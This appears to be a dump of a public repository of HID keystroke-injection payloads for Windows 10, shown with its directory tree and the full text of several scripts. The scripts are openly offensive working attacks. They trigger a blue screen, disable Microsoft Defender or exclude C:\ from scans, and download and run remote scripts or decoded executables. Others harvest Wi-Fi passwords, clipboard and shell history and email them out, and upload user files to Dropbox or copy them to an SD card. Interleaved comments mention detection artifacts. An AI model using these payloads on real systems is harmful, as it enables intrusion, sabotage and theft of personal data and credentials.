├── 5 Second Screen Kill.js ├── BSOD.js ├── Chewbacca.js ├── Decode-Execute Base64.js ├── Decode-Execute from RunPrompt.js ├── Deep-Exfil-to-SD.js ├── Disable-RT-Protect.js ├── Email System Information.js ├── Exclude-C_slow.js ├── Exfil to Dropbox.js ├── Exfil-to-SD.js ├── Fake-Update-win10.js ├── Fast-Execution ├── Beigeworms-Tool-Suite │ ├── Beigeworms-Tool-Suite.js │ ├── README.md │ └── main.ps1 ├── Browser-History-to-Discord │ ├── Browser-History-to-Discord.js │ ├── README.md │ └── main.ps1 ├── Clean-History │ ├── Clean-History.js │ ├── README.md │ └── main.ps1 ├── Computer-Acid │ ├── Computer-ACID-Prank.js │ ├── README.md │ └── main.ps1 ├── Discord-C2 │ ├── Discord C2 Client.js │ └── README.md ├── Discord-Infostealer │ ├── README.md │ ├── System-Info-to-Discord.js │ └── main.ps1 ├── Discord-Keylogger │ ├── Keylogger-to-Discord.js │ ├── README.md │ └── main.ps1 ├── Download-and-Execute │ ├── Download-Execute.js │ └── README.md ├── Exfiltrate-to-Discord │ ├── Exfiltrate-to-Discord.js │ ├── README.md │ └── main.ps1 ├── Exfiltrate-to-Dropbox │ ├── Exfiltrate-to-Dropbox.js │ ├── README.md │ └── main.ps1 ├── Exfiltrate-to-Telegram │ ├── Exfiltrate-to-Telegram.js │ ├── README.md │ └── main.ps1 ├── Exfiltrate-to-USB │ ├── Exfiltrate-to-USB.js │ ├── README.md │ └── main.ps1 ├── File-Monitor-to-Discord │ ├── File-Changes-to-Discord.js │ ├── README.md │ └── main.ps1 ├── Filetype-Organizer │ ├── Filetype-Organizer.js │ ├── README.md │ └── main.ps1 ├── GIF-Player │ ├── Gif-Player.js │ ├── README.md │ └── main.ps1 ├── Google-Phishing │ ├── Google-Phish-to-Discord.js │ ├── README.md │ └── main.ps1 ├── LAN-Tools │ ├── LAN-Tools.js │ └── README.md ├── Mouse-Monitor-to-Discord │ ├── Mouse-Activity-to-Discord.js │ ├── README.md │ └── main.ps1 ├── Netcat-Client │ ├── README.md │ ├── Simple-Netcat-Client.js │ └── main.ps1 ├── Netcat-Screenshare │ ├── Desktop Screenshare over Netcat.js │ ├── README.md │ └── main.ps1 ├── Network-Enumeration-GUI │ ├── Network-Enumeration-GUI.js │ ├── 
README.md │ └── main.ps1 ├── Record-Screen-GUI │ ├── README.md │ ├── Record-Screen-GUI.js │ ├── Record-Screen-GUI.txt │ └── main.ps1 ├── Screen-to-Discord │ ├── README.md │ ├── Screenshot-to-Discord.js │ └── main.ps1 ├── Screen-to-Telegram │ ├── README.md │ ├── Screenshot-to-Telegram.js │ └── main.ps1 ├── Shortcut-Spam │ ├── Desktop-Shortcut-Spam.js │ ├── README.md │ └── main.ps1 ├── Social-Search-GUI │ ├── README.md │ ├── Username-Search-GUI.js │ └── main.ps1 ├── Telegram-C2 │ ├── README.md │ └── Telegram C2 Client.js ├── Telegram-Infostealer │ ├── README.md │ ├── System-Info-to-Telegram.js │ └── main.ps1 ├── Telegram-Keylogger │ ├── Keylogger-to-Telegram.js │ ├── README.md │ └── main.ps1 ├── US-Keyboard-Layout │ ├── README.md │ ├── US-Keyboard.js │ └── main.ps1 ├── Wallpaper-Jumpscare │ ├── README.md │ ├── Wallpaper-Jumpscare.js │ └── main.ps1 ├── Webhook-Spammer-GUI │ ├── README.md │ ├── Webhook-Spammer-GUI.js │ └── main.ps1 ├── Wifi-Networks-to-Discord │ ├── Discord-WiFi-Grabber.js │ ├── README.md │ └── main.ps1 ├── Win10-Phishing │ ├── Fake-Windows-10-Logon.js │ ├── README.md │ └── main.ps1 └── Win11-Phishing │ ├── Fake-Windows-11-Logon.js │ ├── README.md │ └── main.ps1 ├── Fork-Bomb.js ├── GetChromeWIFI.js ├── Goose-from-SD.js ├── HIDden-Voices.js ├── Hidden-Wifi-Shell.js ├── Keylogger to Discord.js ├── Keylogger-to-Email.js ├── README.md ├── Real-Fork-Bomb.js ├── RickRoll-Max-Vol.js ├── Run File from SD.js ├── Set-US-Keyboard.js ├── Simple Netcat Client.js ├── Tree-of-Knowledge.js └── Windows-93_slow.js /5 Second Screen Kill.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: 5 Second Screen Kill 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Killss all displays for around 5 seconds. 
// Target: Windows 10
// =============================================================================

// *USB SETTING*
// startup

// =============================================================================

// HID keystroke-injection script: press() and type() are delivered to the host
// as keyboard input and delay() pauses between steps (units presumably ms).

// script setup
layout("us")

// Open PowerShell from the Run dialog. Plain ENTER is pressed here, so the
// console is not elevated.
// -NoP (no profile), -NonI (non-interactive) and -Exec Bypass (ignore the
// execution policy) appear together in the command line; process-creation
// logging with command-line capture records this launch.
press("GUI r");
delay(1000);
type("powershell -NoP -NonI -Exec Bypass");
delay(500);
press("ENTER");
delay(4000);

// Main Powershell code
// Add-Type compiles a P/Invoke wrapper for user32!SendMessage, then calls it
// with hWnd -1 (broadcast), 0x0112 (WM_SYSCOMMAND), 0xF170 (SC_MONITORPOWER)
// and lParam 2 (display off). The shell then sleeps 5 seconds and exits.
type("(Add-Type '[DllImport(\"user32.dll\")]public static extern int SendMessage (int hWnd, int hMsg, int wParam, int lParam);' -Name a -Pas)::SendMessage(-1,0x0112,0xF170,2);sleep 5;exit");
press("ENTER");
delay(500);
--------------------------------------------------------------------------------
/BSOD.js:
--------------------------------------------------------------------------------
// =============================================================================
// Title: Invoke Blue Screen
// Author: @beigeworm | https://github.com/beigeworm
// Description: Causes a blue screen on a target system.
// Target: Windows 10
// =============================================================================

// =============================================================================
// This is a dangerous script - Be Careful!
// It force-terminates svchost.exe from an elevated shell, so unsaved work on
// the host is lost when the system stops.

// Script Setup
layout('us');
// typingSpeed(1,1);

// Main Payload
press("GUI r");
delay(1000);
type("powershell");
// CONTROL+SHIFT+ENTER asks for an elevated launch; LEFT then ENTER presumably
// moves focus to "Yes" on the UAC consent dialog and confirms it. That step
// depends on the logged-on user being able to approve elevation without
// typing credentials.
press("control shift enter");
delay(2000);
press("left enter");
delay(5000);
type("taskkill /f /im svchost.exe\n"); //instantly kills svchost.exe which causes a bluescreen.
--------------------------------------------------------------------------------
/Chewbacca.js:
--------------------------------------------------------------------------------
//========================== Mon's Chewbacca sound Player ==============================

//SYNOPSIS
// This script will play a Chewbacca sound.
//
// NOTE(review): before playing anything, the script opens an elevated
// PowerShell and sets the system locale and user language list to en-US, so
// it changes host configuration as well as playing audio.

hide=false; // set to true to hide the console window on the target

layout("us")
// Elevated PowerShell from the Run dialog: CONTROL+SHIFT+ENTER requests
// elevation and ALT+y presumably answers the UAC consent prompt.
press("GUI r");
delay(500);
type("powershell -NoP -NonI -Exec Bypass");
press("CONTROL SHIFT ENTER");
delay(2500);
press("ALT y");
delay(3000);
// Query the international settings, then force en-US locale and language list.
type("Dism /online /Get-Intl");
press("ENTER")
type("Set-WinSystemLocale en-US");
press("ENTER")
type("Set-WinUserLanguageList en-US -Force");
press("ENTER")
delay(500);

// Types a PowerShell check: when the pointer size is not 4 bytes (i.e. the
// console is not 32-bit), start the SysWOW64 (32-bit) powershell.exe in it.
function assurePS32() {
  type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n");
  delay(1000);
}

// Types a one-liner that calls SetWindowPos on the console's main window via
// WindowsBase's MS.Win32.UnsafeNativeMethods. Flags 16512 = 0x4000 | 0x0080
// (SWP_ASYNCWINDOWPOS | SWP_HIDEWINDOW), i.e. the window is hidden.
function hidePS() {
  type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,100,100,16512)')
  press("ENTER");
  delay(1000);
}

if (hide) { hidePS(); }
delay(1000);
assurePS32();
delay(2000);

// Wait 300 seconds, download the file to %TEMP%\play.wav, then play it with
// System.Windows.Media.MediaPlayer for its reported duration.
type("start-sleep 300");
press("ENTER");
type("irm -uri \"https://github.com/apsecdev/DigiSpark-Scripts/blob/master/Hi_Chewy/Chewbacca.wav\" -OutFile \"$env:temp\\play.wav\"");
press("ENTER");
type("Add-Type -AssemblyName presentationCore");
press("ENTER");
type("$filepath = [uri] \"$env:temp\\play.wav\"");
press("ENTER");
type("$wmplayer = New-Object System.Windows.Media.MediaPlayer;$wmplayer.Open($filepath)");
press("ENTER");
type("Start-Sleep 2");
press("ENTER");
type("$duration = $wmplayer.NaturalDuration.TimeSpan.TotalSeconds");
press("ENTER");
type("$wmplayer.Play();Start-Sleep $duration;$wmplayer.Stop();$wmplayer.Close();");
press("ENTER");
--------------------------------------------------------------------------------
/Decode-Execute Base64.js:
--------------------------------------------------------------------------------
// =============================================================================
// Title: Base64 Decode & Execute
// Author: @beigeworm | https://github.com/beigeworm
// Description: Uses Powershell to decode a Base64 string and then execute the file.
// Target: Windows 10
// =============================================================================

// *USB SETTING*
// startup

// *SETUP*
// replace YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES and NAME_HERE below.

// =============================================================================

// script setup
layout("us")

// Open Powershell as Admin
// (CONTROL+SHIFT+ENTER requests elevation; ALT+y presumably answers the UAC
// consent prompt.)
press("GUI r");
delay(1000);
type("powershell -NoP -NonI -Exec Bypass");
delay(500);
press("CONTROL SHIFT ENTER");
delay(3000);
press("ALT y");
delay(4000);

// Main Powershell code
// The Base64 text is decoded to bytes, written to "<NAME_HERE>.exe" in the
// shell's current directory with Set-Content -Encoding Byte, and started with
// the call operator. Because the binary arrives as typed text, no network
// download precedes it; the observable events are powershell.exe creating an
// .exe file and then launching it.
type("$b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES';");
press("ENTER");
delay(500);
type("$decodedFile = [System.Convert]::FromBase64String($b64);");
press("ENTER");
delay(500);
type("$File = \"NAME_HERE\"+\".exe\";");
press("ENTER");
delay(500);
type("Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File");
press("ENTER");
delay(500);
--------------------------------------------------------------------------------
/Decode-Execute from RunPrompt.js:
--------------------------------------------------------------------------------
// =============================================================================
// Title: Download and Execute from Run Prompt
// Author: @beigeworm | https://github.com/beigeworm
// Description: Download and Execute any file from the Run Prompt.
// Target: Windows 10
// =============================================================================

// *USB SETTING*
// startup

// =============================================================================

// script setup
layout("us")


// The whole command is typed into the Run dialog as a single line (the two
// type() calls are concatenated before ENTER is pressed). It starts a hidden
// (-W Hidden) PowerShell that changes to %TEMP%, requests a Microsoft Defender
// exclusion for C:\, downloads FILE_URL_HERE to upl.exe and starts it.
// The full command line is visible to process-creation logging, and entries
// typed into the Run dialog are recorded under the user's RunMRU registry key.
press("GUI r");
delay(1000);
type("powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\\;Start-Sleep 1;");
delay(500);
type("iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit");
delay(500);
press("ENTER");

--------------------------------------------------------------------------------
/Deep-Exfil-to-SD.js:
--------------------------------------------------------------------------------
// =============================================================================
// Title: Exfiltrate Files to SD card (Deep)
// Author: @beigeworm | https://github.com/beigeworm
// Description: Searches target for matching filetypes and copies all files to the SD card.
// Target: Windows 10
// =============================================================================

// *USB SETTING*
// exfil lootchest [REQUIRED]

// =============================================================================
// Script Setup
layout('us');
// typingSpeed(1,1);

// Main Payload
// Non-elevated PowerShell from the Run dialog (plain ENTER).
press("GUI r");
delay(1000);
type("powershell -NoP -NonI -Exec Bypass");
delay(500);
press("ENTER");
delay(5000);

// Types a PowerShell check: when the pointer size is not 4 bytes (i.e. the
// console is not 32-bit), start the SysWOW64 (32-bit) powershell.exe in it.
function assurePS32() {
  type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n");
  delay(4000);
}
assurePS32(); // open a 32bit console, if the current one is 64bit
delay(4000);

// All copy commands below run relative to the user's profile directory.
type("cd $env:USERPROFILE\n")

// Looks up the volume whose label is 'RECOVERY' via WMI; change that label to
// the name of your mounted usb volume.
type("$usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'RECOVERY' } | select name\n");
var filetypes = ["jpg", "png", "txt", "html", "gif", "js", "sql", "docx", "php"] // array of filetypes, add filetypes to your liking.
// For each extension, one copy command is typed per directory depth (0 to 15
// levels below the profile directory), all targeting the looked-up volume.
// The result is a burst of writes from powershell.exe to a removable volume,
// which removable-storage auditing or device-control policy can record or block.
for (var i = 0; i < filetypes.length; i++) {
  type("copy *." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
}
--------------------------------------------------------------------------------
/Disable-RT-Protect.js:
--------------------------------------------------------------------------------
// =============================================================================
// Title: Disable Real-Time Protection via GUI
// Author: @beigeworm | https://github.com/beigeworm
// Description: Disable Real-Time Protection via the Windows Defender GUI.
// Target: Windows 10
// =============================================================================

// *USB SETTING*
// startup

// =============================================================================

// Script Setup
layout('us');
// typingSpeed(1,1);

// Main Payload
// Opens the Defender threat-settings page through its URI handler, presses
// SPACE on the control that has focus (presumably the real-time protection
// toggle, per the title), answers the UAC prompt with ALT+y and closes the
// window. Microsoft Defender records real-time protection being turned off in
// its Operational event log (event ID 5001).
delay(1000);
press("GUI r");
delay(2500);
type("windowsdefender://threatsettings");
delay(500);
press("ENTER");
delay(5000);
press("SPACE");
delay(2000);
press("ALT y");
delay(3000);
press("ALT F4");
--------------------------------------------------------------------------------
/Email System Information.js:
--------------------------------------------------------------------------------
// =============================================================================
// Title: Email System Information.
// Author: @beigeworm | https://github.com/beigeworm
// Description: Uses Powershell to gather user and system information and send to an Email.
// Target: Windows 10
// =============================================================================

// *USB SETTING*
// startup

// *REQUIREMENTS*
// you will need a Microsoft Outlook Email address for this to work

// *SETUP*
// replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script)

// =============================================================================

// What the typed PowerShell touches, as visible in the strings below:
//   - WMI classes Win32_UserAccount, Win32_OperatingSystem, Win32_BIOS,
//     Win32_Processor, Win32_ComputerSystem and Win32_Product
//   - an outbound request to ifconfig.me/ip for the public IP address
//   - `netsh wlan show profiles ... key=clear` for saved Wi-Fi keys
//   - the clipboard and the PSReadLine ConsoleHost_history.txt file
//   - a staging file at %TEMP%\sys.txt
//   - Send-MailMessage over TLS to smtp.outlook.com on port 587
// Each of these is an observable artifact for host or network monitoring.
// The mailbox password is typed into the console in clear text, so it also
// ends up in whatever command logging is enabled on the host.

// script setup
layout("us")

// Open Powershell as Admin
press("GUI r");
delay(1000);
type("powershell -NoP -NonI -Exec Bypass");
delay(500);
press("CONTROL SHIFT ENTER");
delay(3000);
press("ALT y");
delay(4000);

// Main Powershell code
// Every type() after the first starts with ";" so the console treats the
// fragments as separate statements, one entered per ENTER press.
type("$email = \"EMAIL_HERE\";$pass = \"PASSWORD_HERE\"");
press("ENTER");
delay(500);
// User name, full name and public IP address.
type(";$usr = \"Username: $($usrinf.Name)\";$usr += \"`nFull Name: $($usrinf.FullName)`n\";$usr+=\"Public Ip Address = \";$usr+=((Iwr ifconfig.me/ip).Content.Trim() | Out-String)");
press("ENTER");
delay(500);
type(";$usr+=\"`n\";$usr+=\"All User Accounts: `n\";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem");
press("ENTER");
delay(500);
type(";$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount");
press("ENTER");
delay(500);
// OS, BIOS, CPU, memory and computer name.
type(";$sysstr = \"Operating System: $($sys.Caption) $($sys.OSArchitecture)\";$sysstr += \"`nBIOS Version: $($bios.SMBIOSBIOSVersion)\";$sysstr += \"`nProcessor: $($proc.Name)\"");
press("ENTER");
delay(500);
type(";$sysstr += \"`nMemory: $($sys.TotalVisibleMemorySize) MB\";$sysstr += \"`nComputer Name: $($comp.Name)\";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version");
press("ENTER");
delay(500);
// Installed programs (name and version).
type(";$progstr = \"Installed Programs:`n\";foreach($program in $iprog){;$progstr += \"$($program.Name) $($program.Version)`n\"}");
press("ENTER");
delay(500);
// Saved Wi-Fi profiles and their keys, read through netsh.
type(";$a=0;$ws=(netsh wlan show profiles) -replace \".*:\\s+\"");
press("ENTER");
delay(500);
type(";foreach($s in $ws){if($a -gt 1 -And $s -NotMatch \" policy \" -And $s -ne \"User profiles\" -And $s -NotMatch \"-----\" -And $s -NotMatch \"\" -And $s.length -gt 5){");
press("ENTER");
delay(500);
type(";$ssid=$s.Trim();if($s -Match \":\"){$ssid=$s.Split(\":\")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass=\"None\"");
press("ENTER");
delay(500);
type(";foreach($p in $pw){if($p -Match \"Key Content\"){$pass=$p.Split(\":\")[1].Trim();$wifistr+=\"SSID: $ssid`nPassw: $pass`n\"}}}$a++;}");
press("ENTER");
delay(500);
// Path of the PSReadLine command history file.
type(";$pshist = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\"");
press("ENTER");
delay(500);
// Everything collected is appended, section by section, to %TEMP%\sys.txt.
type(";\" USER INFO`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII;$usr | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append");
press("ENTER");
delay(500);
type(";\" CLIPBOARD INFO`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append");
press("ENTER");
delay(500);
type(";\" POWERSHELL HISTORY`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append");
press("ENTER");
delay(500);
type(";\" SYSTEM INFO`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append;$sysstr | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append");
press("ENTER");
delay(500);
type(";\" WIFI INFO`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append;$wifistr | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append");
press("ENTER");
delay(500);
type(";\" PROGRAMS INFO`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append;$progstr | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append");
press("ENTER");
delay(500);
// Mail subject, body and SMTP settings; the staging file is the attachment.
type(";$syslog = \"$env:temp\\sys.txt\";$subj = \"$env:COMPUTERNAME : : Results\";$body = \"$env:COMPUTERNAME : Info Scraper Results... : $time\"");
press("ENTER");
delay(500);
type(";$smtp = \"smtp.outlook.com\";$prt = \"587\";$cdtl = new-object Management.Automation.PSCredential $eml, ($psw | ConvertTo-SecureString -AsPlainText -Force)");
press("ENTER");
delay(500);
type(";$time = Get-Date;$ct = $time.addminutes($lost)");
press("ENTER");
delay(500);
type(";send-mailmessage -from $eml -to $eml -subject $subj -body $body -Attachment $syslog -smtpServer $smtp -port $prt -credential $cdtl -usessl");
press("ENTER");
delay(500);
type(";sleep 1;exit");
press("ENTER");
delay(500);
--------------------------------------------------------------------------------
/Exclude-C_slow.js:
--------------------------------------------------------------------------------
// =============================================================================
// Title: Exclude C:/ Drive.
// Author: @beigeworm | https://github.com/beigeworm
// Description: Exclude C:/ Drive from future Microsoft Defender scans.
// Target: Windows 10
// =============================================================================

// *USB SETTING*
// startup

// =============================================================================

// Script Setup
layout('us');
// typingSpeed(1,1);

// Main Payload
// Elevated PowerShell from the Run dialog (CONTROL+SHIFT+ENTER requests
// elevation, ALT+y presumably answers the UAC consent prompt), then one
// command that adds C:\ to the Microsoft Defender exclusion paths and exits.
// Defender configuration changes are written to its Operational event log
// (event ID 5007), and the current exclusions can be reviewed with
// Get-MpPreference; an exclusion covering a whole drive root is rarely
// legitimate and is worth alerting on.
press("GUI r");
delay(1000);
type("powershell -NoP -NonI -Exec Bypass");
delay(500);
press("CONTROL SHIFT ENTER");
delay(2000);
press("ALT y");
delay(4000);
type("Add-MpPreference -ExclusionPath C:\\ ; exit");
press("ENTER")
--------------------------------------------------------------------------------
/Exfil to Dropbox.js:
--------------------------------------------------------------------------------
// =============================================================================
// Title: Exfiltrate to Dropbox
// Author: @beigeworm | https://github.com/beigeworm
// Description: Exfiltrate specified filetypes to Dropbox.
// Target: Windows 10
// =============================================================================

// *USB SETTING*
// startup

// *SETUP*
// make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app)
// generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE.
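
// =============================================================================

// script setup
layout("us")

// Open Powershell as Admin
// (CONTROL+SHIFT+ENTER requests elevation; ALT+y presumably answers the UAC
// consent prompt.)
press("GUI r");
delay(1000);
type("powershell -NoP -NonI -Exec Bypass");
delay(500);
press("CONTROL SHIFT ENTER");
delay(3000);
press("ALT y");
delay(4000);

// Main Powershell code
// The access token is a placeholder, as the SETUP notes describe. A real API
// token must never be committed to a repository: anyone who can read the file
// can use it, and a token that has already been published has to be revoked
// at the provider, not just deleted from the file.
type("$accessToken = \"DROPBOX_ACCESS_TOKEN_HERE\"");
type(";$localFolderPath = \"$env:USERPROFILE\"; $computerName = \"$env:COMPUTERNAME\"; $dropboxCreateFolderUrl = \"https://api.dropboxapi.com/2/files/create_folder_v2\"");
type(";$dropboxFolderPath = $computerName.ToString(); $dropboxUploadUrl = \"https://content.dropboxapi.com/2/files/upload\" ");
press("ENTER");
delay(500);
// Request headers: bearer token plus a binary content type.
type("$headers = @{\"Authorization\" = \"Bearer $accessToken\"");
press("ENTER");
delay(500);
type("\"Content-Type\" = \"application/octet-stream\"}");
press("ENTER");
delay(500);
type("$body = @{\"path\" = \"/$computerName\"");
press("ENTER");
delay(500);
// Recursively enumerates .docx/.txt/.pdf/.jpg/.png files under the user's
// profile directory.
type("\"autorename\" = $true}| ConvertTo-Json; $files = Get-ChildItem -Path $localFolderPath -Include \"*.docx\",\"*.txt\",\"*.pdf\",\"*.jpg\",\"*.png\" -Recurse ");
press("ENTER");
delay(500);
// Each file is read into memory and POSTed to content.dropboxapi.com under a
// folder named after the computer; upload errors are swallowed by the empty
// catch. For network monitoring, the indicator is powershell.exe sending many
// uploads to the Dropbox content API.
type("foreach($file in $files){$relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\') ");
type(";$dropboxFilePath = \"$dropboxFolderPath/$relativePath\".Replace('\\', '/') ");
type(";$headers[\"Dropbox-API-Arg\"] = \"{`\"path`\": `\"/$dropboxFilePath`\", `\"mode`\": `\"add`\", `\"autorename`\": true, `\"mute`\": false}\"");
type(";try{$fileBytes = [System.IO.File]::ReadAllBytes($file.FullName) ");
type(";$response = Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes}catch{}}");
delay(500);
press("ENTER");

--------------------------------------------------------------------------------
/Exfil-to-SD.js:
--------------------------------------------------------------------------------
// =============================================================================
// Title: Exfiltrate Files to SD card.
// Author: @beigeworm | https://github.com/beigeworm
// Description: Searches target for matching filetypes and copies all files to the SD card.
// Target: Windows 10
// =============================================================================

// *USB SETTING*
// exfil lootchest [REQUIRED]

// =============================================================================

// Script Setup
layout('us');
// typingSpeed(1,1);

// Main Payload
press("GUI r");
delay(1000);
type("powershell -NoP -NonI -Exec Bypass");
delay(500);
press("CONTROL SHIFT ENTER");
delay(3000);
press("ALT y");
delay(4000);

// Types a PowerShell check: when the pointer size is not 4 bytes (i.e. the
// console is not 32-bit), start the SysWOW64 (32-bit) powershell.exe in it.
function assurePS32() {
  type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n");
  delay(4000);
}
assurePS32(); // open a 32bit console, if the current one is 64bit
delay(4000);

// Looks up the volume whose label is 'RECOVERY' via WMI; change that label to
// the name of your mounted usb volume.
type("$usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'RECOVERY' } | select name\n")
var filetypes = ["jpg", "png", "txt", "html", "gif", "js", "sql", "docx", "php"] // array of filetypes, add filetypes to your liking.
// One copy command per extension and directory depth (0 to 3 levels below the
// console's current directory), all targeting the looked-up volume.
for (var i = 0; i < filetypes.length; i++) {
  type("copy *." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
  type("copy */*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume.
}
--------------------------------------------------------------------------------
/Fake-Update-win10.js:
--------------------------------------------------------------------------------
// =============================================================================
// Title: Fake Update for Windows
// Author: @beigeworm | https://github.com/beigeworm
// Description: Start a fake Update for Windows through a browser.
// Target: Windows 10
// =============================================================================

// *USB SETTING*
// startup

// =============================================================================

// Script Setup
layout('us');
// typingSpeed(1,1);

// Main Payload
// Step 1: elevated cmd that force-kills every msedge.exe process tree, then exits.
delay(500);
press("GUI r");
delay(1500);
type("cmd");
delay(200)
press("CTRL SHIFT ENTER");
delay(2000);
press("ALT y");
delay(4000);
type("taskkill /F /IM msedge.exe /T > nul")
delay(100);
press("ENTER");
delay(500);
type("exit")
delay(100);
press("ENTER");
delay(2000);
// Step 2: relaunch Edge in kiosk mode on the fake-update page and press F11.
press("GUI r");
delay(1500);
type("msedge.exe --new-window -kiosk https://fakeupdate.net/win8");
delay(200)
press("ENTER");
delay(1500);
press("F11");
--------------------------------------------------------------------------------
/Fast-Execution/Beigeworms-Tool-Suite/Beigeworms-Tool-Suite.js:
--------------------------------------------------------------------------------
// Title: beigeworm's Tool Suite GUI
// Author: @beigeworm
// Description: This script Starts a GUI with a huge set of tools.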
// Target: Windows 10

// script setup
layout("us")

// Open Powershell and download script
// `irm ... | iex` fetches a script with Invoke-RestMethod and runs it with
// Invoke-Expression, so this line itself writes no script file to disk. The
// source is a URL-shortener link, which hides the real download location from
// anyone reading the command line. PowerShell script block logging (event ID
// 4104) records the code that Invoke-Expression actually executes.
delay(1000);
press("GUI r");
delay(1000);
type("powershell -NoP -Ep Bypass -C irm is.gd/bwtoolset | iex");
delay(500);
press("ENTER");

--------------------------------------------------------------------------------
/Fast-Execution/Beigeworms-Tool-Suite/README.md:
--------------------------------------------------------------------------------


Beigeworm's Toolset GUI


SYNOPSIS

All useful tools in one place.
A selection of Powershell tools from this repo can be ran from this script.

USAGE


1. Run the script and follow options in the GUI

INFO

Closing this script will NOT close any scripts that were started from this script.
Any background/hidden scripts eg. C2 clients will keep running.
--------------------------------------------------------------------------------
/Fast-Execution/Browser-History-to-Discord/Browser-History-to-Discord.js:
--------------------------------------------------------------------------------
// Title: beigeworm's browser history to Discord Webhook.
// Author: @beigeworm
// Description: This script collects browser history and posts results to a discord webhook.
// Target: Windows 10

// script setup
layout("us")

// Open Powershell and download script
// A hidden-window (-W H) PowerShell sets $dc to the webhook URL, then fetches
// main.ps1 from raw.githubusercontent.com and runs it with Invoke-Expression.
// The webhook URL is part of the typed command line, so process-creation
// logging captures it; script block logging (event ID 4104) records the
// downloaded script body.
delay(1000);
press("GUI r");
delay(1000);
